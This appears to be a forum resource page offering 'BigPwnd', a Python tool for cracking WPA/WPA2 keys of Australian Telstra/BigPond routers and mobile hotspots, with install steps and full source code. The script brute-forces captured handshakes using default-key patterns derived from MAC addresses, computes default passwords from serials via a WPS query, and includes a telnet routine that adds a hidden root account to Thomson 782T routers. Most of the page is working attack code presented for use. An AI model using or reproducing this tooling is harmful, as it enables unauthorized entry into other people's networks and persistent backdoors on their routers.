Captain_Noobius from hackforums.net has written a script for Australian users to aid in cracking BigPond/Telstra WPA/WPA2 networks. It may also work in other countries where Thomson and Speedtouch routers are present.
It is to be used with BACKTRACK, Kali and other Ubuntu / Debian distros.
Features
Default WPA/2 calculator for Telstra mobile hotspots. They are the prepaid/postpaid 3G & 4G models including MF60, MF61, MF70 and MF91. They can be identified with SSID's such as: TPP4G_123456, TEHS_123456, TEWM_123456, etc.
This script has features for cracking common wireless routers used in our country. They can be identified with SSID's such as
BigPondXXXX, BigPondXX, TEHS_XXXX, Wi-Fi 4G-XXXX, TPP-4G_XX
It should also give you the routers serial. From what I can see the password is generated in a similar way to the Thomson routers. It looks like it is derived from the serial with possibly SHA224 or SHA256.
Extract it
Make the setup script executableCode:Select Alltar -xvzf BigPwnd.tar.gz
Run it by typingCode:Select Allchmod +x bigpwndSetup.py
After it installs you can run the script from any terminal by simply typing:Code:Select Allpython bigpwndSetup.py
bigpwnd
Just enter the mac address and get the WPA key
The setup will make a directory:
/pentest/wireless/BigPwnd
Place the .cap files you want to crack here. One thing to note is the .cap file must be named exactly the same as the SSID. Eg. BigPond1A2A3A must be name BigPond1A2A3A.cap
The script gives you a menu and you can either crack a saved handshake or you can use the wps2key attack. The wps2key attack is virtually instant against BigPond networks with a T782T router. It sends a packet to the router and receives the routers serial number as a reply, it then converts that serial number to the WPA2 password.
The saved handshake cracking option is also successful depending on the network you got the handshake from. If you have a handshake from a TEHS_XX network it will crack it under 10 seconds. Likewise certain BigPondXXXX networks can be cracked in the same time, although some BigPondXXXX networks use a 2Wire router and in that case the script will switch to a 10 digit bruteforce attack. That could take a while depending on how fast your PC is.
If you use my bigpwnd script and select the wps2key option it should return the serial in the terminal. You will see an output similar to this:
So you should see the serial number appear next to the Serial Number column.Code:Select AllBSSID: 08:76:FF:D7:8A:0F ESSID: BigPondD78A0F -- Version : 0x10 WPS State : 0x02 Selected Registrar : 0x00 Response Type : 0x03 UUID-E : 0x13e81761283359ea9880d1c5be3e20e2 Manufacturer : Technicolor Model Name : Technicolor TG Model Number : 587n v3 Serial Number : 1127RA560 WIRELESS PASSWORD : UNSUPPORTED Primary Device Type : 0x00060050f2040001 Device Name : Technicolor TG587n v3 Config Methods : 0x0084 RF Bands : 0x01
Routers with the ssid TEHS_XX use a default WPA pass based on the MAC address of the router. BigPwnd grabs that mac address from the capture file and appends it to the output of crunch and within seconds you have cracked the password.
Likewise routers that have a ssid of BigPondXXXX can be one of a couple of options. They are either a 2Wire or they are a N3G9W or maybe something else. BigPwnd will determine the router based on the mac address contained in your handshake capture and use crunch with aircrack based on the best method.
The Script
Code:Select All#!/usr/bin/python # BigPwnd (MADE FOR BACKTRACK 5) # written by Capt_Noobius # thanks to derv82 (author of wifite) ##DISCLAIMER - This script is designed to be used to test your OWN network security. ##The author of this script takes no responsibility for malicious use of this script # Attacks are tailored for BigPond networks. These include networks named: BigPondXXXX,BigPondXXXXXX,TEHS_XXXX, # Wi-Fi 4G-XXXX, etc... # Your .cap files should be placed in /pentest/wireless/BigPwnd/ import os import sys import time import telnetlib from sys import stdout, stdin from signal import SIGINT, SIGTERM from subprocess import Popen, call, PIPE import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * from scapy.utils import rdpcap #Script colours W = "\033[1;0m"; # white (normal) DR= "\033[1;31m"; #Dark red BLA= "\033[30m"; # black R = "\033[31m"; # red G = "\033[1;32m"; #bright green O = "\033[1;33m"; # super orange B = "\033[1;34m"; # blue P = "\033[1;35m"; # purple C = "\033[36m"; # cyan CY = "\033[33m";# gold? GR = "\033[37m"; # gray ################# #Useful Variables ################# #path of WPA handshake captures path= '/pentest/wireless/BigPwnd/' # file extensions hccap = '.hccap' # not currently supported pcap = '.cap' #hide output from iwconfig/airmon-ng hide_output = open(os.devnull, 'w') #wireless variables for wps2key wireless_iface = '' iface_to_take_down = '' ################ #Main functions ################ def clear_screen(): clear= 'clear' os.system(clear) def handshake_options(): global hs_essid_stripped global net_name global hs_file hs_essid_stripped= os.path.splitext(os.path.basename(hs_selection))[0] net_name= '"' + hs_essid_stripped + '"' hs_file= '' if any(hs_selection.endswith(hccap) for ext in hccap): print "hccap files not currently supported" sys.exit() if any(hs_selection.endswith(pcap) for ext in pcap): hs_file= net_name+pcap def handshake_menu(): clear_screen() banner() global hs_cap global hs_file global hs_selection print print "%sAVAILABLE HANDSHAKES TO CRACK%s" % (O,W) print dirList=sorted(os.listdir(path)) for i in range(0,len(dirList)): print "%d)" % (i+1), dirList[i] print selected = raw_input("Enter the number of the handshake you would like to crack: ") selected = int(selected) hs_selection= dirList[selected-1] handshake_options() print print "%s%s selected%s" % (O,hs_selection,W) bigpond_main_menu() #------------ #MONITOR MODE #------------ def enable_monitor_mode(iface): global iface_to_take_down global get_iface print DR+' [+]'+W+' enabling monitor mode on %s...' % (O+iface+W), stdout.flush() call(['airmon-ng', 'start', iface], stdout=hide_output, stderr=hide_output) print 'done' iface_to_take_down = get_iface() return iface_to_take_down def disable_monitor_mode(): if iface_to_take_down == '': return print DR+' [+]'+W+' disabling monitor mode on %s...' % (O+iface_to_take_down+W), stdout.flush() call(['airmon-ng', 'stop', iface_to_take_down], stdout=hide_output, stderr=hide_output) print print 'done' printed_scanning = False def get_iface(): global printed_scanning if not printed_scanning: print DR+' [+]'+W+' scanning for wireless devices...' printed_scanning = True proc = Popen(['iwconfig'], stdout=PIPE, stderr=hide_output) iface = '' monitors = [] for line in proc.communicate()[0].split('\n'): if len(line) == 0: continue if ord(line[0]) != 32: iface = line[:line.find(' ')] if line.find('Mode:Monitor') != -1: monitors.append(iface) if wireless_iface != '': if monitors.count(wireless_iface): return wireless_iface print DR+' [!]'+O+' could not find wireless interface %s' % ('"'+R+wireless_iface+O+'"'+W) if len(monitors) == 1: return monitors[0] elif len(monitors) > 1: print G+" [+]"+W+" interfaces in "+G+"monitor mode:"+W for i, monitor in enumerate(monitors): print " %s. %s" % (G+str(i+1)+W, G+monitor+W) ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s%d%s): %s" % \ (DR, W, G, W, G, len(monitors), W, G)) while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors): ri = raw_input("%s [+]%s select number of interface to use for capturing (%s%d%s): %s" % \ (DR, W, G, len(monitors), W, G)) i = int(ri) return monitors[i - 1] proc = Popen(['airmon-ng'], stdout=PIPE, stderr=hide_output) for line in proc.communicate()[0].split('\n'): if len(line) == 0 or line.startswith('Interface'): continue monitors.append(line) if len(monitors) == 0: print print DR+' [!]'+O+" no wireless interfaces were found."+W print DR+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W sys.exit(0) elif wireless_iface != '' and monitors.count(wireless_iface) > 0: return enable_monitor-mode print DR+" [+]"+W+" available wireless devices:" for i, monitor in enumerate(monitors): print print " %s%d%s. %s" % (G, i + 1, W, monitor) print ri = raw_input(DR+" [+]"+W+" select number of device to put into monitor mode (%s%d%s): " % (G, len(monitors), W)) while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors): print ri = raw_input(" [+] select number of device to put into monitor mode (%s%d%s): " % (G, len(monitors), W)) i = int(ri) monitor = monitors[i-1][:monitors[i-1].find('\t')] return enable_monitor_mode(monitor) #---------------------------- # WPA CRACKING MENU FUNCTIONS #---------------------------- def aircrack_tendigit(): print aircrack_tendigit_attack= '/pentest/passwords/crunch/./crunch 10 10 -f /pentest/passwords/crunch/charset.lst numeric -i | aircrack-ng -e %s %s -w-' % (net_name, path+hs_file) os.system(aircrack_tendigit_attack) def aircrack_eightnumbers(): print aircrack_eightdigit_attack= '/pentest/passwords/crunch/./crunch 8 8 -f /pentest/passwords/crunch/charset.lst numeric -i | aircrack-ng -e %s %s -w-' % (net_name, path+hs_file) os.system(aircrack_eightdigit_attack) def aircrack_ninenumbers(): print aircrack_ninedigit_attack= '/pentest/passwords/crunch/./crunch 9 9 -f /pentest/passwords/crunch/charset.lst numeric -i | aircrack-ng -e %s %s -w-' % (net_name, path+hs_file) os.system(aircrack_ninedigit_attack) def bigpond_main_menu(): clear_screen() banner() print print " Selected handshake: %s%s%s" % (O,hs_selection,W) print print " Available tailored attack methods: " print print (" %s[%s1%s]%s BigPondXXXX ") % (DR,W,DR,W) print (" %s[%s2%s]%s BigPondXXXXXX ") % (DR,W,DR,W) print (" %s[%s3%s]%s Wi-Fi 4G-XXXX ") % (DR,W,DR,W) print (" %s[%s4%s]%s TEHS_XXXXXX ") % (DR,W,DR,W) print (" %s[%s5%s]%s TPP4G_XXXXXX ") % (DR,W,DR,W) print (" %s[%s6%s]%s Back to Main Menu ") % (DR,W,DR,W) print bp_mm_variable=raw_input(" Pick a number: ") if (bp_mm_variable == "1"): bigpondXXXX_smartattack_decision_maker() if (bp_mm_variable == "2"): bigpondXXXXXX_menu() if (bp_mm_variable =="3"): telstra_mobile_bruteforce() if (bp_mm_variable == "4"): bigpond_tehs_smartattack_decision_maker() if (bp_mm_variable == "5"): bigpond_tpp4g_smartattack_decision_maker() if (bp_mm_variable == "6"): main_script() def bigpondXXXX_smartattack_decision_maker(): pkts=rdpcap(path+hs_essid_stripped+'.cap') p=pkts[0] for pkt in pkts: mac_address= p.addr2 mac_check = mac_address[:8] if mac_check == '00:1a:2b': print print "%sSmart attack available! Launching ninja maneuvers...%s" % (G,W) time.sleep(3) bigpondXXXX_attack() elif mac_check == '00:1e:c7': print print "%s2Wire router detected. 10 digit bruteforce initiated...%s" % (O,W) time.sleep(2) aircrack_tendigit() elif mac_check == '00:1f:b3': print print "%s2Wire router detected. 10 digit bruteforce initiated...%s" % (O,W) time.sleep(2) aircrack_tendigit() elif mac_check == '00:22:a4': print print "%s2Wire router detected. 10 digit bruteforce initiated...%s" % (O,W) time.sleep(2) aircrack_tendigit() else: print print "%sTarget is not a valid BigPondXXXX network or you need to clean your cap file with wpaclean%s" % (O,W) print sys.exit(0) def bigpond_tehs_smartattack_decision_maker(): smart_tehs_ssid = hs_essid_stripped[:5] if smart_tehs_ssid == 'TEHS_': print print "%sSmart attack available! Launching ninja maneuvers...%s" % (G,W) time.sleep(3) bigpond_mobile_smart_attack() else: print print "%s Target is not a vaild TEHS_XXXXXX network%s" % (O,W) def bigpond_tpp4g_smartattack_decision_maker(): smart_tehs_ssid = hs_essid_stripped[:6] if smart_tehs_ssid == 'TPP4G_': print print "%sSmart attack available! Launching ninja manouvers...%s" % (G,W) time.sleep(3) bigpond_mobile_smart_attack() else: print print "%s Target is not a vaild TPP4G_XXXXXX network%s" % (O,W) def bigpondXXXX_attack(): clear_screen() banner() print print bigpondXXXXfirstfour = hs_essid_stripped[7:] clear_screen() banner() print bigpondXXXXcrunch='1%%%41' bigpondXXXXmain='/pentest/passwords/crunch/./crunch 10 10 -t %s%s -i | aircrack-ng -e %s %s -w-' % (bigpondXXXXcrunch,bigpondXXXXfirstfour,net_name, path+hs_file) os.system(bigpondXXXXmain) def bigpondXXXXXX_menu(): clear_screen() banner() print " Selected handshake: %s%s%s" % (O,hs_selection,W) print print(" %sBIGPONDXXXXXX CHOICES%s") % (O,W) print print(" %s[%s1%s]%s Bruteforce BigPond WPA handshake ") % (DR,W,DR,W) print(" %s[%s2%s]%s Wps2key attack (recommended) ") % (DR,W,DR,W) print(" %s[%s3%s]%s Previous menu ") % (DR,W,DR,W) print bp_xx_variable=raw_input(" Pick a number: ") if (bp_xx_variable == "1"): bigpond_bruteforce() if (bp_xx_variable == "2"): bigpond_attack() if (bp_xx_variable == "3"): bigpond_main_menu() def bigpond_bruteforce(): print bruteforce_main= '/pentest/passwords/crunch/./crunch 10 10 -f /pentest/passwords/crunch/charset.lst hex-upper -i | aircrack-ng -e %s %s -w-' % (net_name, path+hs_file) os.system(bruteforce_main) def bigpond_mobile_smart_attack(): global mac_replace pkts=rdpcap(path+hs_selection,1) p=pkts[0] for pkt in pkts: mac_address= p.addr2 mac_replace = mac_address.replace(':', '')[6:].upper() crunch_four='8@@@' smart_attack= '/pentest/passwords/crunch/./crunch 10 10 -f /pentest/passwords/crunch/charset.lst numeric -t %s%s | aircrack-ng -e %s %s -w-' % (crunch_four,mac_replace,net_name, path+hs_file) os.system(smart_attack) def telstra_mobile_bruteforce(): print telstra_main= '/pentest/passwords/crunch/./crunch 8 8 -f /pentest/passwords/crunch/charset.lst numeric | aircrack-ng -e %s %s -w-' % (net_name, path+hs_file) os.system(telstra_main) def bigpond_attack(): clear_screen() banner() print print "Wps2key default WEP/WPA password attack " print print "Wps2key calculates the default wireless password for BigPond " print "routers. Unsupported routers will show as UNSUPPORTED. " print "You can press CTRL+C when you are ready to stop the script... " time.sleep(2) print big_path= '/pentest/wireless/BigPwnd/./wps2key.py -i mon0 ' get_iface() time.sleep(2) clear_screen() banner() print print print "Now looking for routers..." print time.sleep(2) print print "Default password will show next to the %sWIRELESS PASSWORD%s column" % (G,W) time.sleep(2) os.system(big_path) disable_monitor_mode() #-------------------------------------- # LOCAL NETWORK ROUTER BACKDOOR OPTIONS #-------------------------------------- def local_network_menu(): clear_screen() banner() print print(" %sLOCAL NETWORK CRACKING OPTIONS:%s") % (O,W) print print(" %s[%s1%s]%s Create backdoor on Thomson782T") % (DR,W,DR,W) print(" %s[%s2%s]%s Back to Main Menu") % (DR,W,DR,W) print local_network_options=raw_input(" Pick a number: ") if (local_network_options == "1"): thomson_telnet() if (local_network_options == "2"): main_script() def thomson_telnet(): clear_screen() banner() print print "%sTHOMSON 782T BACKDOOR SCRIPT%s" % (O,W) print print "This script will create a user named telstra " print "with ROOT privleges on a Thomson 782T router." print try: time.sleep(2) host = "10.0.0.138" user= "admin" password= "\r\n" telnet = telnetlib.Telnet(host) telnet.read_until(b"Username : ",8) telnet.write(user + "\r\n") telnet.read_until(b"Password : ",4) telnet.write(password + "\r\n") telnet.write('script add name addroot command "user add name telstra password telstra role root descr ROOT" ' + "\r\n") telnet.write('script run name addroot pars "" ' + "\r\n") telnet.write('saveall' + "\r\n") telnet.close() print print "User telstra has been created on the device. Have fun :)" except: socket.error print "Error not connected to BigPond network" print sys.exit() #---------- # MAIN MENU #---------- def banner(): print """ %s$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%s %s______ _ ______ _ | ___ (_) | ___ \ | | | |_/ /_ __ _| |_/ __ ___ __ __| | | ___ | |/ _` | __/\ \ /\ / | '_ \ / _` | | |_/ | | (_| | | \ V V /| | | | (_| | \____/|_|\__, \_| \_/\_/ |_| |_|\__,_| __/ | |___/ %s %s$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%s by %sCapt_Noobius%s""" % (DR,W,G,W,DR,W,P,W) def main_script(): try: clear_screen() banner() print print(" %sMAIN MENU:%s") % (O,W) print print(" %s[%s1%s]%s Crack saved WPA/2 handshakes ") % (DR,W,DR,W) print(" %s[%s2%s]%s BigPond network backdoor ") % (DR,W,DR,W) print(" %s[%s3%s]%s Wps2key default pass attack ") % (DR,W,DR,W) print(" %s[%s4%s]%s Exit ") % (DR,W,DR,W) print choices_variable=raw_input(" Pick a number: ") if (choices_variable == "1"): handshake_menu() if (choices_variable == "2"): local_network_menu() if (choices_variable == "3"): bigpond_attack() if (choices_variable == "4"): sys.exit() except KeyboardInterrupt: print print print "%sShutdown requested...exiting%s" % (R,W) print print print clear_screen() main_script()
BigPwnd 0.1
Crack WPA / WPA2 BigPond Telstra Networks in Australia
- Watchers:
- This resource is being watched by 428 members.